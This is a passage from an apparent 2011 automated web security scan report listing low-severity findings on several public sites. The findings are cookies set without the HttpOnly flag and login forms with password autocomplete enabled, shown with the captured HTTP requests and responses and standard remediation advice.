Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:17:14 GMT
Connection: close

11.46. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u2=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=10.1103&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:24 GMT
Connection: close
Content-Length: 0

11.47. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsGfUFGa5OE02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
B2=7lgH0820wsI83xP08y8ysF7gi30820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
C3=0uP4820wsI000w000_0u3F8y8ysF0000040_0uO9820wsG0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
D3=0uP402HA820wsI0u3F00358y8ysF0uO9002P820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
E2=0a+r820wsG02WG820wsI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsGfUFGa5OE02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI83xP08y8ysF7gi30820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_0u3F8y8ysF0000040_0uO9820wsG0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI0u3F00358y8ysF0uO9002P820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WG820wsI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Content-Length: 2868

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

11.48. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:34:26 GMT; path=/; domain=digg.com
d=2d42bedfcbae53b8ee6f61a9c9010100cced8e8e45672361cf74370761950c78; expires=Mon, 11-Jan-2021 13:42:06 GMT; path=/; domain=.digg.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.49. http://download.cnet.com/1770-20_4-0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/1770-20_4-0.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
arrowLat=1294837274322; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.50. http://download.cnet.com/8300-2007_4-12.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8300-2007_4-12.xml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
arrowLat=1294837275148; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.51. http://download.cnet.com/8301-2007_4-20015771-12.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20015771-12.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:19 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
arrowLat=1294837280385; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:19 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.52. http://download.cnet.com/8301-2007_4-20027809-12.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20027809-12.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:04:47 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
arrowLat=1294803287158; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:34:47 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.53. http://download.cnet.com/8301-2007_4-20027809-12.html-- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20027809-12.html--

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:24 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
arrowLat=1294837284526; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:24 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.54. http://download.cnet.com/8301-2007_4-20027865-12.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20027865-12.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:32 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
arrowLat=1294837292036; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:32 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.55. http://download.cnet.com/download-blog/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/download-blog/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:47 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
arrowLat=1294837306898; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:47 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.56. http://download.cnet.com/mac/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/mac/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:49 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
arrowLat=1294837309101; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:49 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.57. http://download.cnet.com/mobile-downloads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/mobile-downloads/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:50 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
arrowLat=1294837310099; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:50 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.58. http://download.cnet.com/webware-apps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/webware-apps/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:54 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
arrowLat=1294837313774; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:54 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.59. http://download.cnet.com/windows/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/windows/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:55 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
arrowLat=1294837315852; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:55 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.60. http://landesm.gfi.com/event-log-analysis-sm/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://landesm.gfi.com
Path:	/event-log-analysis-sm/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

__ptcx=7uXan4.9hp3Sx.1; expires=Mon, 11 Jul 2011 03:46:07 GMT; Path=/
__pcid=7uXan4:1; Domain=.gfi.com; expires=Mon, 11 Jul 2011 03:46:07 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event-log-analysis-sm/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.61. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-a0f0083=a0f022f:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:17:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...

11.62. http://www.ccmaine.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

1c7b37f4426f042e0fdf703338ebc738=d5da178e07009ab3ea602b970835b537; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 10 Jan 2011 18:18:50 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Set-Cookie: 1c7b37f4426f042e0fdf703338ebc738=d5da178e07009ab3ea602b970835b537; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.ccmaine.net/HomePage
Content-Length: 0
Content-Type: text/html; charset=UTF-8

11.63. http://www.zdnet.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zdnet.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:08:03 GMT; path=/; domain=.zdnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12. Password field with autocomplete enabled previous next
There are 15 instances of this issue:

http://account.theregister.co.uk/register/
http://darkblue.com/index.htm
http://darkblue.com/index.htm
http://digg.com/submit
https://edit.yahoo.com/registration
http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/
http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/
http://lists.arin.net/mailman/listinfo/arin-whoisrws
http://whitepapers.theregister.co.uk/
http://whitepapers.theregister.co.uk/search/
http://www.43things.com/person/
http://www.admob.com/
http://www.connect.facebook.com/widgets/fan.php
http://www.sentinelinvestments.com/advisor-login
http://www.tukaiz.com/index.php

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

12.1. http://account.theregister.co.uk/register/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://account.theregister.co.uk
Path:	/register/

Issue detail

The page contains a form with the following action URL:

http://account.theregister.co.uk/register/

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

GET /register/ HTTP/1.1
Host: account.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.2. http://darkblue.com/index.htm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://darkblue.com
Path:	/index.htm

Issue detail

The page contains a form with the following action URL:

https://www.darkblue.com/index.htm

The form contains the following password field with autocomplete enabled:

loginpass

Request

GET /index.htm HTTP/1.1
Host: darkblue.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 5723
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Dar
...[SNIP]...
</h3>
<form name="" id="affiliateForm" action="https://www.darkblue.com/index.htm" method="POST">
<input type="hidden" name="logintype" value="pub">
...[SNIP]...
<div class="error-wrap"><input id="affiliate-password" type="password" name="loginpass" class="required" /></div>
...[SNIP]...

12.3. http://darkblue.com/index.htm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://darkblue.com
Path:	/index.htm

Issue detail

The page contains a form with the following action URL:

https://www.darkblue.com/index.htm

The form contains the following password field with autocomplete enabled:

loginpass

Request

GET /index.htm HTTP/1.1
Host: darkblue.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 5723
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Dar
...[SNIP]...
</h3>
<form name="" id="advertiserForm" action="https://www.darkblue.com/index.htm" method="POST">
<input type="hidden" name="logintype" value="adv">
...[SNIP]...
<div class="error-wrap"><input id="advertiser-password" type="password" name="loginpass" class="required" /></div>
...[SNIP]...

12.4. http://digg.com/submit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL:

http://digg.com/submit

The form contains the following password field with autocomplete enabled:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
